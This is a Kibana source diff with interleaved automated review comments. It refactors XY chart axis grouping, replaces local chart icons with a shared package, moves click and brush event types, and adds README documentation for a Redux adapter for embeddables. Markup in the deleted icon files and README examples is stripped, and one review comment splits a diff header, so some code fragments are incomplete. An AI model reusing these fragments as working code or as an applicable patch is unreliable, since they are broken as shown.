@@ -129,16 +134,23 @@ export function groupAxesByType( ) : undefined; - let axisGroupId = LEFT_GLOBAL_AXIS_ID; - - if (series[LEFT_GLOBAL_AXIS_ID].length === 0 || leftAxisGroupId) { - axisGroupId = leftAxisGroupId || LEFT_GLOBAL_AXIS_ID; - } else if (series[RIGHT_GLOBAL_AXIS_ID].length === 0 || rightAxisGroupId) { - axisGroupId = rightAxisGroupId || RIGHT_GLOBAL_AXIS_ID; - } else if (series[RIGHT_GLOBAL_AXIS_ID].length >= series[LEFT_GLOBAL_AXIS_ID].length) { - axisGroupId = LEFT_GLOBAL_AXIS_ID; + const rightSeriesCount = rightSeriesKeys.reduce((acc, key) => { + return acc + series[key].length; + }, 0); + const leftSeriesCount = leftSeriesKeys.reduce((acc, key) => { + return acc + series[key].length; + }, 0); + + let axisGroupId; + + if (leftSeriesCount === 0 || leftAxisGroupId) { + axisGroupId = leftAxisGroupId || leftSeriesKeys[0]; + } else if (rightSeriesCount === 0 || rightAxisGroupId) { + axisGroupId = rightAxisGroupId || rightSeriesKeys[0]; + } else if (rightSeriesCount >= leftSeriesCount) { + axisGroupId = leftSeriesKeys[0]; } else { - axisGroupId = RIGHT_GLOBAL_AXIS_ID; + axisGroupId = rightSeriesKeys[0]; } series[axisGroupId].push(currentSeries); diff --git a/src/plugins/chart_expressions/expression_xy/public/helpers/icon.ts b/src/plugins/chart_expressions/expression_xy/public/helpers/icon.ts index 8b4113b3ada11..a74d4196f487d 100644 --- a/src/plugins/chart_expressions/expression_xy/public/helpers/icon.ts +++ b/src/plugins/chart_expressions/expression_xy/public/helpers/icon.ts @@ -7,7 +7,7 @@ */ import { i18n } from '@kbn/i18n'; -import { TriangleIcon, CircleIcon } from '../icons'; +import { IconTriangle, IconCircle } from '@kbn/chart-icons'; import { AvailableReferenceLineIcons } from '../../common/constants'; export function hasIcon(icon: string | undefined): icon is string { 
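Review bot: `let axisGroupId;` has no annotation, so its type is inferred from the assignments below; `leftSeriesKeys[0]` and `rightSeriesKeys[0]` are indexed accesses, and under `noUncheckedIndexedAccess` they would widen it to `string | undefined` and make `series[axisGroupId]` need a guard, so declare it as `let axisGroupId: string;` and rely on the `push` fallback from the previous hunk, which guarantees both key lists are non-empty. That fallback also changes routing: when one or more axes are defined on a side, every auto series goes to `leftSeriesKeys[0]` or `rightSeriesKeys[0]`, i.e. whichever defined axis was collected first, and nothing in the hunk says so; a comment above the `let`, e.g. `// auto series attach to the first defined axis on the chosen side, or to the global axis when none is defined`, would make the choice explicit. The two `reduce` counts are recomputed on every iteration of `series.auto.forEach` because `series[axisGroupId].push` changes them, which is correct and worth a one-line comment so nobody hoists them out of the loop. The enclosing `groupAxesByType` starts and ends outside the hunk.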
@@ -56,7 +56,7 @@ export const iconSet = [ label: i18n.translate('expressionXY.xyChart.iconSelect.circleIconLabel', { defaultMessage: 'Circle', }), - icon: CircleIcon, + icon: IconCircle, canFill: true, }, @@ -105,7 +105,7 @@ export const iconSet = [ label: i18n.translate('expressionXY.xyChart.iconSelect.triangleIconLabel', { defaultMessage: 'Triangle', }), - icon: TriangleIcon, + icon: IconTriangle, shouldRotate: true, canFill: true, }, diff --git a/src/plugins/chart_expressions/expression_xy/public/icons/area_percentage.tsx b/src/plugins/chart_expressions/expression_xy/public/icons/area_percentage.tsx deleted file mode 100644 index a51e66b68ba93..0000000000000 --- a/src/plugins/chart_expressions/expression_xy/public/icons/area_percentage.tsx +++ /dev/null @@ -1,32 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React from 'react'; -import { EuiIconProps } from '@elastic/eui'; - -export const AreaPercentageIcon = ({ title, titleId, ...props }: Omit) => ( - - {title ? {title} : null} - - - -); diff --git a/src/plugins/chart_expressions/expression_xy/public/icons/area_stacked.tsx b/src/plugins/chart_expressions/expression_xy/public/icons/area_stacked.tsx deleted file mode 100644 index c2b9fbe926328..0000000000000 --- a/src/plugins/chart_expressions/expression_xy/public/icons/area_stacked.tsx +++ /dev/null 
@@ -1,32 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React from 'react'; -import { EuiIconProps } from '@elastic/eui'; - -export const AreaStackedIcon = ({ title, titleId, ...props }: Omit) => ( - - {title ? {title} : null} - - - -); diff --git a/src/plugins/chart_expressions/expression_xy/public/icons/bar_reference_line.tsx b/src/plugins/chart_expressions/expression_xy/public/icons/bar_reference_line.tsx deleted file mode 100644 index 95bd8e2a8d0a2..0000000000000 --- a/src/plugins/chart_expressions/expression_xy/public/icons/bar_reference_line.tsx +++ /dev/null @@ -1,37 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React from 'react'; -import { EuiIconProps } from '@elastic/eui'; - -export const BarReferenceLineIcon = ({ title, titleId, ...props }: Omit) => ( - - {title ? {title} : null} - - - - - -); diff --git a/src/plugins/chart_expressions/expression_xy/public/icons/index.ts b/src/plugins/chart_expressions/expression_xy/public/icons/index.ts deleted file mode 100644 index 4ca0b640a3d89..0000000000000 --- a/src/plugins/chart_expressions/expression_xy/public/icons/index.ts +++ /dev/null 
@@ -1,22 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -export { BarHorizontalPercentageIcon } from './bar_horizontal_percentage'; -export { BarHorizontalStackedIcon } from './bar_horizontal_stacked'; -export { BarReferenceLineIcon } from './bar_reference_line'; -export { AreaPercentageIcon } from './area_percentage'; -export { BarHorizontalIcon } from './bar_horizontal'; -export { BarPercentageIcon } from './bar_percentage'; -export { AreaStackedIcon } from './area_stacked'; -export { BarStackedIcon } from './bar_stacked'; -export { TriangleIcon } from './triangle'; -export { MixedXyIcon } from './mixed_xy'; -export { CircleIcon } from './circle'; -export { AreaIcon } from './area'; -export { LineIcon } from './line'; -export { BarIcon } from './bar'; diff --git a/src/plugins/chart_expressions/expression_xy/public/icons/line.tsx b/src/plugins/chart_expressions/expression_xy/public/icons/line.tsx deleted file mode 100644 index 6735f58b734ec..0000000000000 --- a/src/plugins/chart_expressions/expression_xy/public/icons/line.tsx +++ /dev/null @@ -1,32 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React from 'react'; -import { EuiIconProps } from '@elastic/eui'; - -export const LineIcon = ({ title, titleId, ...props }: Omit) => ( - - {title ? {title} : null} - - - -); 
diff --git a/src/plugins/chart_expressions/expression_xy/public/icons/mixed_xy.tsx b/src/plugins/chart_expressions/expression_xy/public/icons/mixed_xy.tsx deleted file mode 100644 index e16b7f6bed76f..0000000000000 --- a/src/plugins/chart_expressions/expression_xy/public/icons/mixed_xy.tsx +++ /dev/null @@ -1,36 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React from 'react'; -import { EuiIconProps } from '@elastic/eui'; - -export const MixedXyIcon = ({ title, titleId, ...props }: Omit) => ( - - {title ? {title} : null} - - - - -); diff --git a/src/plugins/charts/public/index.ts b/src/plugins/charts/public/index.ts index d6cae90d50057..8fd3fcf29f2cb 100644 --- a/src/plugins/charts/public/index.ts +++ b/src/plugins/charts/public/index.ts @@ -9,6 +9,7 @@ // TODO: https://github.com/elastic/kibana/issues/110891 /* eslint-disable @kbn/eslint/no_export_all */ +import { RangeSelectContext, ValueClickContext } from '@kbn/embeddable-plugin/public'; import { ChartsPlugin } from './plugin'; export const plugin = () => new ChartsPlugin(); @@ -19,6 +20,16 @@ export * from './static'; export { lightenColor } from './services/palettes/lighten_color'; export { useActiveCursor } from './services/active_cursor'; +export interface ClickTriggerEvent { + name: 'filter'; + data: ValueClickContext['data']; +} + +export interface BrushTriggerEvent { + name: 'brush'; + data: RangeSelectContext['data']; +} + export type { CustomPaletteArguments, CustomPaletteState, diff --git a/src/plugins/charts/public/static/index.ts b/src/plugins/charts/public/static/index.ts index 53078eebe9c56..031e90019d3c1 100644 --- a/src/plugins/charts/public/static/index.ts 
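Review bot: `RangeSelectContext` and `ValueClickContext` are used only in type positions (the `data:` members of the two new interfaces), so the import added in the first hunk of charts/public/index.ts should be `import type { RangeSelectContext, ValueClickContext } from '@kbn/embeddable-plugin/public';`; as a value import it keeps a runtime edge from the charts plugin's public entry to the embeddable plugin purely for types, and the file already uses `export type` for its type-only re-exports. The two interfaces moved here from the deleted transform_click_event.ts carry no TSDoc; a one-liner on each, e.g. `/** Event fired when a chart element is clicked; `data` is the embeddable value-click trigger context. */`, would help consumers now that they live in the plugin's public index.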
+++ b/src/plugins/charts/public/static/index.ts @@ -8,5 +8,4 @@ export * from './colors'; export * from './components'; -export * from './utils'; export * from '../../common/static/styles'; diff --git a/src/plugins/charts/public/static/utils/transform_click_event.ts b/src/plugins/charts/public/static/utils/transform_click_event.ts deleted file mode 100644 index ec35fa85d59a1..0000000000000 --- a/src/plugins/charts/public/static/utils/transform_click_event.ts +++ /dev/null 
@@ -1,282 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { - XYChartSeriesIdentifier, - GeometryValue, - XYBrushEvent, - Accessor, - AccessorFn, - Datum, -} from '@elastic/charts'; - -import { RangeSelectContext, ValueClickContext } from '@kbn/embeddable-plugin/public'; -import { Datatable } from '@kbn/expressions-plugin/public'; - -export interface ClickTriggerEvent { - name: 'filter'; - data: ValueClickContext['data']; -} - -export interface BrushTriggerEvent { - name: 'brush'; - data: RangeSelectContext['data']; -} - -type AllSeriesAccessors = Array< - [accessor: Accessor | AccessorFn, value: string | number] ->; - -/** - * returns accessor value from string or function accessor - * @param datum - * @param accessor - */ -function getAccessorValue(datum: D, accessor: Accessor | AccessorFn) { - if (typeof accessor === 'function') { - return accessor(datum); - } - - return (datum as Datum)[accessor]; -} - -/** - * This is a little unorthodox, but using functional accessors makes it - * difficult to match the correct column. This creates a test object to throw - * an error when the target id is accessed, thus matcing the target column. 
- */ -function validateAccessorId(id: string, accessor: Accessor | AccessorFn) { - if (typeof accessor !== 'function') { - return id === accessor; - } - - const matchedMessage = 'validateAccessorId matched'; - - try { - accessor({ - get [id]() { - throw new Error(matchedMessage); - }, - }); - return false; - } catch ({ message }) { - return message === matchedMessage; - } -} - -/** - * Groups split accessors by their accessor string or function and related value - * - * @param splitAccessors - * @param splitSeriesAccessorFnMap - */ -const getAllSplitAccessors = ( - splitAccessors: Map, - splitSeriesAccessorFnMap?: Map -): Array<[accessor: Accessor | AccessorFn, value: string | number]> => - [...splitAccessors.entries()].map(([key, value]) => [ - splitSeriesAccessorFnMap?.get?.(key) ?? key, - value, - ]); - -/** - * Gets value from small multiple accessors - * - * Only handles single small multiple accessor - */ -function getSplitChartValue({ - smHorizontalAccessorValue, - smVerticalAccessorValue, -}: Pick): - | string - | number - | undefined { - if (smHorizontalAccessorValue !== undefined) { - return smHorizontalAccessorValue; - } - - if (smVerticalAccessorValue !== undefined) { - return smVerticalAccessorValue; - } - - return; -} - -/** - * Reduces matching column indexes - * - * @param xAccessor - * @param yAccessor - * @param splitAccessors - */ -const columnReducer = - ( - xAccessor: Accessor | AccessorFn | null, - yAccessor: Accessor | AccessorFn | null, - splitAccessors: AllSeriesAccessors, - splitChartAccessor?: Accessor | AccessorFn - ) => - ( - acc: Array<[index: number, id: string]>, - { id }: Datatable['columns'][number], - index: number - ): Array<[index: number, id: string]> => { - if ( - (xAccessor !== null && validateAccessorId(id, xAccessor)) || - (yAccessor !== null && validateAccessorId(id, yAccessor)) || - (splitChartAccessor !== undefined && validateAccessorId(id, splitChartAccessor)) || - splitAccessors.some(([accessor]) => 
validateAccessorId(id, accessor)) - ) { - acc.push([index, id]); - } - - return acc; - }; - -/** - * Finds matching row index for given accessors and geometry values - * - * @param geometry - * @param xAccessor - * @param yAccessor - * @param splitAccessors - */ -const rowFindPredicate = - ( - geometry: GeometryValue | null, - xAccessor: Accessor | AccessorFn | null, - yAccessor: Accessor | AccessorFn | null, - splitAccessors: AllSeriesAccessors, - splitChartAccessor?: Accessor | AccessorFn, - splitChartValue?: string | number - ) => - (row: Datatable['rows'][number]): boolean => - (geometry === null || - (xAccessor !== null && - getAccessorValue(row, xAccessor) === getAccessorValue(geometry.datum, xAccessor) && - yAccessor !== null && - getAccessorValue(row, yAccessor) === getAccessorValue(geometry.datum, yAccessor) && - (splitChartAccessor === undefined || - (splitChartValue !== undefined && - getAccessorValue(row, splitChartAccessor) === splitChartValue)))) && - [...splitAccessors].every(([accessor, value]) => getAccessorValue(row, accessor) === value); - -/** - * Helper function to transform `@elastic/charts` click event into filter action event - * - * @param table - * @param xAccessor - * @param splitSeriesAccessorFnMap needed when using `splitSeriesAccessors` as `AccessorFn` - * @param negate - */ -export const getFilterFromChartClickEventFn = - ( - table: Datatable, - xAccessor: Accessor | AccessorFn, - splitSeriesAccessorFnMap?: Map, - splitChartAccessor?: Accessor | AccessorFn, - negate: boolean = false - ) => - (points: Array<[GeometryValue, XYChartSeriesIdentifier]>): ClickTriggerEvent => { - const data: ValueClickContext['data']['data'] = []; - - points.forEach((point) => { - const [geometry, { yAccessor, splitAccessors }] = point; - const splitChartValue = getSplitChartValue(point[1]); - const allSplitAccessors = getAllSplitAccessors(splitAccessors, splitSeriesAccessorFnMap); - const columns = table.columns.reduce>( - columnReducer(xAccessor, 
yAccessor, allSplitAccessors, splitChartAccessor), - [] - ); - const row = table.rows.findIndex( - rowFindPredicate( - geometry, - xAccessor, - yAccessor, - allSplitAccessors, - splitChartAccessor, - splitChartValue - ) - ); - const newData = columns.map(([column, id]) => ({ - table, - column, - row, - value: table.rows?.[row]?.[id] ?? null, - })); - - data.push(...newData); - }); - - return { - name: 'filter', - data: { - negate, - data, - }, - }; - }; - -/** - * Helper function to get filter action event from series - */ -export const getFilterFromSeriesFn = - (table: Datatable) => - ( - { splitAccessors, ...rest }: XYChartSeriesIdentifier, - splitSeriesAccessorFnMap?: Map, - splitChartAccessor?: Accessor | AccessorFn, - negate = false - ): ClickTriggerEvent => { - const splitChartValue = getSplitChartValue(rest); - const allSplitAccessors = getAllSplitAccessors(splitAccessors, splitSeriesAccessorFnMap); - const columns = table.columns.reduce>( - columnReducer(null, null, allSplitAccessors, splitChartAccessor), - [] - ); - const row = table.rows.findIndex( - rowFindPredicate(null, null, null, allSplitAccessors, splitChartAccessor, splitChartValue) - ); - const data: ValueClickContext['data']['data'] = columns.map(([column, id]) => ({ - table, - column, - row, - value: table.rows?.[row]?.[id] ?? null, - })); - - return { - name: 'filter', - data: { - negate, - data, - }, - }; - }; - -/** - * Helper function to transform `@elastic/charts` brush event into brush action event - */ -export function getBrushFromChartBrushEventFn( - table: Datatable, - xAccessor: Accessor | AccessorFn -) { - return ({ x: selectedRange }: XYBrushEvent): BrushTriggerEvent => { - const [start, end] = selectedRange ?? [0, 0]; - const range: [number, number] = [start, end]; - const column = table.columns.findIndex(({ id }) => validateAccessorId(id, xAccessor)); - - return { - data: { - table, - column, - range, - }, - name: 'brush', - }; - }; -} 
diff --git a/src/plugins/dashboard/public/application/lib/dashboard_session_storage.ts b/src/plugins/dashboard/public/application/lib/dashboard_session_storage.ts
index a696c8bc15b83..0c6aaba99b9ee 100644
--- a/src/plugins/dashboard/public/application/lib/dashboard_session_storage.ts
+++ b/src/plugins/dashboard/public/application/lib/dashboard_session_storage.ts
@@ -6,7 +6,7 @@
  * Side Public License, v 1.
  */
 
-import { set } from '@elastic/safer-lodash-set';
+import { set } from '@kbn/safer-lodash-set';
 import { Storage } from '../../services/kibana_utils';
 import { NotificationsStart } from '../../services/core';
 import { panelStorageErrorStrings } from '../../dashboard_strings';
diff --git a/src/plugins/data/common/search/aggs/metrics/top_hit.test.ts b/src/plugins/data/common/search/aggs/metrics/top_hit.test.ts
index 719687ea970bd..c25c6a70c994e 100644
--- a/src/plugins/data/common/search/aggs/metrics/top_hit.test.ts
+++ b/src/plugins/data/common/search/aggs/metrics/top_hit.test.ts
@@ -12,6 +12,7 @@ import { AggConfigs } from '../agg_configs';
 import { mockAggTypesRegistry } from '../test_helpers';
 import { IMetricAggConfig } from './metric_agg_type';
 import { KBN_FIELD_TYPES } from '../../..';
+import * as tabifyModule from '../../tabify/tabify_docs';
 
 describe('Top hit metric', () => {
   let aggDsl: Record;
@@ -79,6 +80,11 @@ describe('Top hit metric', () => {
     aggDsl = aggConfig.toDsl(aggConfigs);
   };
 
+  const flattenSpy = jest.spyOn(tabifyModule, 'flattenHit');
+  beforeEach(() => {
+    jest.clearAllMocks();
+  });
+
   it('should return a label prefixed with Last if sorting in descending order', () => {
     init({ fieldName: 'bytes' });
     expect(getTopHitMetricAgg().makeLabel(aggConfig)).toEqual('Last bytes');
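Review bot: The `flattenSpy` created with `jest.spyOn(tabifyModule, 'flattenHit')` in the `@@ -79` hunk is never restored, and the `jest.clearAllMocks()` added to `beforeEach` resets call history for every mock in the file rather than just this spy. Consider `afterAll(() => flattenSpy.mockRestore());` and `flattenSpy.mockClear()` inside the `beforeEach`, so the spy's lifetime is explicit and mocks set up elsewhere in the describe block (outside this hunk) are not cleared as a side effect.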
@@ -208,6 +214,7 @@ describe('Top hit metric', () => {
     init({ fieldName: '@tags' });
 
     expect(getTopHitMetricAgg().getValue(aggConfig, bucket)).toBe('aaa');
+    expect(flattenSpy).toHaveLastReturnedWith({ '@tags': 'aaa' });
   });
 
   it('should return the object if the field value is an object', () => {
@@ -232,6 +239,7 @@ describe('Top hit metric', () => {
     expect(getTopHitMetricAgg().getValue(aggConfig, bucket)).toEqual({
       label: 'aaa',
     });
+    expect(flattenSpy).toHaveLastReturnedWith({ '@tags': { label: 'aaa' } });
   });
 
   it('should return an array if the field has more than one values', () => {
@@ -251,6 +259,7 @@ describe('Top hit metric', () => {
     init({ fieldName: '@tags' });
 
     expect(getTopHitMetricAgg().getValue(aggConfig, bucket)).toEqual(['aaa', 'bbb']);
+    expect(flattenSpy).toHaveLastReturnedWith({ '@tags': ['aaa', 'bbb'] });
   });
 
   it('should return undefined if the field is not in the source nor in the doc_values field', () => {
diff --git a/src/plugins/data/common/search/aggs/metrics/top_hit.ts b/src/plugins/data/common/search/aggs/metrics/top_hit.ts
index ce120f1271632..fee74bade2aa1 100644
--- a/src/plugins/data/common/search/aggs/metrics/top_hit.ts
+++ b/src/plugins/data/common/search/aggs/metrics/top_hit.ts
@@ -11,7 +11,7 @@ import { i18n } from '@kbn/i18n';
 import { aggTopHitFnName } from './top_hit_fn';
 import { IMetricAggConfig, MetricAggType } from './metric_agg_type';
 import { METRIC_TYPES } from './metric_agg_types';
-import { KBN_FIELD_TYPES } from '../../..';
+import { flattenHit, KBN_FIELD_TYPES } from '../../..';
 import { BaseAggParams } from '../types';
 
 export interface AggParamsTopHit extends BaseAggParams {
@@ -216,7 +216,7 @@ export const getTopHitMetricAgg = () => {
 
       let values = _.flatten(
         hits.map((hit) =>
-          path === '_source' ? hit._source : agg.getIndexPattern().flattenHit(hit, true)[path]
+          path === '_source' ? hit._source : flattenHit(hit, agg.getIndexPattern())[path]
         )
       );
 
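Review bot: The replaced call `agg.getIndexPattern().flattenHit(hit, true)[path]` in the `@@ -216` hunk passed `true` as a second argument, while the new `flattenHit(hit, agg.getIndexPattern())[path]` passes only the hit and the index pattern; if that boolean selected a flattening mode (deep/meta-field handling, for instance), the standalone `flattenHit` needs an equivalent option or callers' values change silently. The three new `toHaveLastReturnedWith` assertions in the test hunks only check the flattened `@tags` field, so they would not catch a difference on nested or meta fields. The body of `getTopHitMetricAgg` starts and ends outside the hunk.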
diff --git a/src/plugins/data/common/search/search_source/search_source.ts b/src/plugins/data/common/search/search_source/search_source.ts
index 9f16795efa37a..5f4ce4be637a8 100644
--- a/src/plugins/data/common/search/search_source/search_source.ts
+++ b/src/plugins/data/common/search/search_source/search_source.ts
@@ -58,7 +58,7 @@
  * `appSearchSource`.
  */
 
-import { setWith } from '@elastic/safer-lodash-set';
+import { setWith } from '@kbn/safer-lodash-set';
 import { difference, isEqual, isFunction, isObject, keyBy, pick, uniqueId, uniqWith } from 'lodash';
 import {
   catchError,
diff --git a/src/plugins/embeddable/README.md b/src/plugins/embeddable/README.md
index fc6632252bb01..14fab2f8412f3 100644
--- a/src/plugins/embeddable/README.md
+++ b/src/plugins/embeddable/README.md
@@ -4,6 +4,7 @@ The Embeddables Plugin provides an opportunity to expose reusable interactive wi
 ## Capabilities
 - Framework-agnostic API.
 - Out-of-the-box React support.
+- Integration with Redux.
 - Integration with the [UI Actions](https://github.com/elastic/kibana/tree/HEAD/src/plugins/ui_actions) plugin.
 - Hierarchical structure to enclose multiple widgets.
 - Error handling.
@@ -354,6 +355,251 @@ The plugin provides a set of ready-to-use React components that abstract renderi Apart from the React components, there is also a way to construct an embeddable object using `useEmbeddableFactory` hook. This React hook takes care of producing an embeddable and updating its input state if passed state changes. +### Redux +The plugin provides an adapter for Redux over the embeddable state. +It uses the Redux Toolkit library underneath and works as a decorator on top of the [`configureStore`](https://redux-toolkit.js.org/api/configureStore) function. +In other words, it provides a way to use the full power of the library together with the embeddable plugin features. + +The adapter implements a bi-directional sync mechanism between the embeddable instance and the Redux state. +To perform state mutations, the plugin also exposes a pre-defined state of the actions that can be extended by an additional reducer. + +Here is an example of initializing a Redux store: +```tsx +import React from 'react'; +import { render } from 'react-dom'; +import { connect, Provider } from 'react-redux'; +import { Embeddable, IEmbeddable } from '@kbn/embeddable-plugin/public'; +import { createStore, State } from '@kbn/embeddable-plugin/public/store'; +import { HelloWorldComponent } from './hello_world_component'; + +export const HELLO_WORLD = 'HELLO_WORLD'; + +export class HelloWorld extends Embeddable { + readonly type = HELLO_WORLD; + + readonly store = createStore(this); + + reload() {} + + render(node: HTMLElement) { + const Component = connect((state: State) => ({ title: state.input.title }))( + HelloWorldComponent + ); + + render( + + + , + node + ); + } +} +``` + +Then inside the embedded component, it is possible to use the [`useSelector`](https://react-redux.js.org/api/hooks#useselector) and [`useDispatch`](https://react-redux.js.org/api/hooks#usedispatch) hooks. 
+```tsx +import React from 'react'; +import { useDispatch, useSelector } from 'react-redux'; +import { actions, State } from '@kbn/embeddable-plugin/public/store'; +import { ViewMode } from '@kbn/embeddable-plugin/public'; +import type { HelloWorld } from './hello_world'; + +interface HelloWorldComponentProps { + title?: string; +} + +export function HelloWorldComponent({ title }: HelloWorldComponentProps) { + const viewMode = useSelector>(({ input }) => input.viewMode); + const dispatch = useDispatch(); + + return ( +
+

{title}

+ {viewMode === ViewMode.EDIT && ( + dispatch(actions.input.setTitle(target.value))} + /> + )} +
+ ); +} +``` + +#### Custom Properties +The `createStore` function provides an option to pass a custom reducer in the second argument. +That reducer will be merged with the one the embeddable plugin provides. +That means there is no need to reimplement already existing actions. + +```tsx +import React from 'react'; +import { render } from 'react-dom'; +import { createSlice } from '@reduxjs/toolkit'; +import { + Embeddable, + EmbeddableInput, + EmbeddableOutput, + IEmbeddable +} from '@kbn/embeddable-plugin/public'; +import { createStore, State } from '@kbn/embeddable-plugin/public/store'; + +interface HelloWorldInput extends EmbeddableInput { + greeting?: string; +} + +interface HelloWorldOutput extends EmbeddableOutput { + message?: string; +} + +const input = createSlice({ + name: 'hello-world-input', + initialState: {} as HelloWorldInput, + reducers: { + setGreeting(state, action: PayloadAction) { + state.greeting = action.payload; + }, + }, +}); + +const output = createSlice({ + name: 'hello-world-input', + initialState: {} as HelloWorldOutput, + reducers: { + setMessage(state, action: PayloadAction) { + state.message = action.payload; + }, + }, +}); + +export const actions = { + ...input.actions, + ...output.actions, +}; + +export class HelloWorld extends Embeddable { + readonly store = createStore(this, { + reducer: { + input: input.reducer, + output: output.reducer, + } + }); + + // ... +} +``` + +There is a way to provide a custom reducer that will manipulate the root state: +```typescript +// ... + +import { createAction, createRducer } from '@reduxjs/toolkit'; + +// ... 
+ +const setGreeting = createAction('greeting'); +const setMessage = createAction('message'); +const reducer = createReducer({} as State, (builder) => + builder + .addCase(setGreeting, (state, action) => ({ ...state, input: { ...state.input, greeting: action.payload } })) + .addCase(setMessage, (state, action) => ({ ...state, output: { ...state.output, message: action.payload } })) +); + +export const actions = { + setGreeting, + setMessage, +}; + +export class HelloWorld extends Embeddable { + readonly store = createStore(this, { reducer }); + + // ... +} +``` + +#### Custom State +Sometimes, there is a need to store a custom state next to the embeddable state. +This can be achieved by passing a custom reducer. + +```tsx +import React from 'react'; +import { render } from 'react-dom'; +import { createSlice } from '@reduxjs/toolkit'; +import { Embeddable, IEmbeddable } from '@kbn/embeddable-plugin/public'; +import { createStore, State } from '@kbn/embeddable-plugin/public/store'; + +interface ComponentState { + foo?: string; + bar?: string; +} + +export interface HelloWorldState extends State { + component: ComponentState; +} + +const component = createSlice({ + name: 'hello-world-component', + initialState: {} as ComponentState, + reducers: { + setFoo(state, action: PayloadAction) { + state.foo = action.payload; + }, + setBar(state, action: PayloadAction) { + state.bar = action.payload; + }, + }, +}); + +export const { actions } = component; + +export class HelloWorld extends Embeddable { + readonly store = createStore(this, { + preloadedState: { + component: { + foo: 'bar', + bar: 'foo', + } + }, + reducer: { component: component.reducer } + }); + + // ... +} +``` + +#### Typings +When using the `useSelector` hook, it is convenient to have a `State` type to guarantee type safety and determine types implicitly. 
+ +For the state containing input and output substates only, it is enough to use a utility type `State`: +```typescript +import { useSelector } from 'react-redux'; +import type { State } from '@kbn/embeddable-plugin/public/store'; +import type { Embeddable } from './some_embeddable'; + +// ... +const title = useSelector>((state) => state.input.title); +``` + +For the more complex case, the best way would be to define a state type separately: +```typescript +import { useSelector } from 'react-redux'; +import type { State } from '@kbn/embeddable-plugin/public/store'; +import type { Embeddable } from './some_embeddable'; + +interface EmbeddableState extends State { + foo?: string; + bar?: Bar; +} + +// ... +const foo = useSelector((state) => state.foo); +``` + +#### Advanced Usage +In case when there is a need to enhance the produced store in some way (e.g., perform custom serialization or debugging), it is possible to use [parameters](https://redux-toolkit.js.org/api/configureStore#parameters) supported by the `configureStore` function. + +In case when custom serialization is needed, that should be done using middleware. The embeddable plugin's `createStore` function does not apply any middleware, so all the synchronization job is done outside the store. + ## API Please use automatically generated API reference or generated TypeDoc comments to find the complete documentation. diff --git a/src/plugins/embeddable/public/__stories__/embeddable_panel.stories.tsx b/src/plugins/embeddable/public/__stories__/embeddable_panel.stories.tsx index 1f15b942fb589..97e8b83b9f7b1 100644 --- a/src/plugins/embeddable/public/__stories__/embeddable_panel.stories.tsx +++ b/src/plugins/embeddable/public/__stories__/embeddable_panel.stories.tsx 
@@ -25,6 +25,7 @@ import { CoreTheme } from '@kbn/core-theme-browser';
 import type { Action } from '@kbn/ui-actions-plugin/public';
 
 import { CONTEXT_MENU_TRIGGER, EmbeddablePanel, PANEL_BADGE_TRIGGER, ViewMode } from '..';
+import { actions } from '../store';
 import { HelloWorldEmbeddable } from './hello_world_embeddable';
 
 const layout: DecoratorFn = (story) => {
@@ -93,20 +94,16 @@ const HelloWorldEmbeddablePanel = forwardRef<
   const theme = useContext(ThemeContext) as CoreTheme;
 
   useEffect(() => theme$.next(theme), [theme$, theme]);
+  useEffect(() => {
+    embeddable.store.dispatch(actions.input.setTitle(title));
+  }, [embeddable.store, title]);
+  useEffect(() => {
+    embeddable.store.dispatch(
+      actions.input.setViewMode(viewMode ? ViewMode.VIEW : ViewMode.EDIT)
+    );
+  }, [embeddable.store, viewMode]);
   useEffect(
-    () =>
-      embeddable.updateInput({
-        title,
-        viewMode: viewMode ? ViewMode.VIEW : ViewMode.EDIT,
-        lastReloadRequestTime: new Date().getMilliseconds(),
-      }),
-    [embeddable, title, viewMode]
-  );
-  useEffect(
-    () =>
-      embeddable.updateOutput({
-        loading,
-      }),
+    () => void embeddable.store.dispatch(actions.output.setLoading(loading)),
     [embeddable, loading]
   );
   useImperativeHandle(ref, () => ({ embeddable }));
@@ -162,7 +159,9 @@ export function DefaultWithBadges({ badges, ...props }: DefaultWithBadgesProps)
 
   useEffect(
     () =>
-      ref.current?.embeddable.updateInput({ lastReloadRequestTime: new Date().getMilliseconds() }),
+      void ref.current?.embeddable.store.dispatch(
+        actions.input.setLastReloadRequestTime(new Date().getMilliseconds())
+      ),
     [getActions]
   );
 
@@ -207,7 +206,9 @@ export function DefaultWithContextMenu({ items, ...props }: DefaultWithContextMe
 
   useEffect(
     () =>
-      ref.current?.embeddable.updateInput({ lastReloadRequestTime: new Date().getMilliseconds() }),
+      void ref.current?.embeddable.store.dispatch(
+        actions.input.setLastReloadRequestTime(new Date().getMilliseconds())
+      ),
     [getActions]
   );
 
